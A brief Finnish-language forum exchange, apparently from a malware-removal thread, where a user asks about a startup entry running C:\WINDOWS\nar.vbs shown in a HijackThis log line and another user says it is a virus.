O4 - HKLM\..\Run: [nar] C:\WINDOWS\nar.vbs

 

Tehty.

Onko muuten mitää tietoa mikä tuo Nar.vbs on? Tai siis mistä se on tullut, miksi se avasi tuon ikkunan joka käynnistyksessä, mitä se tekee, mitä hyötyä/haittaa siitä on?

 

virustahan se huutelee.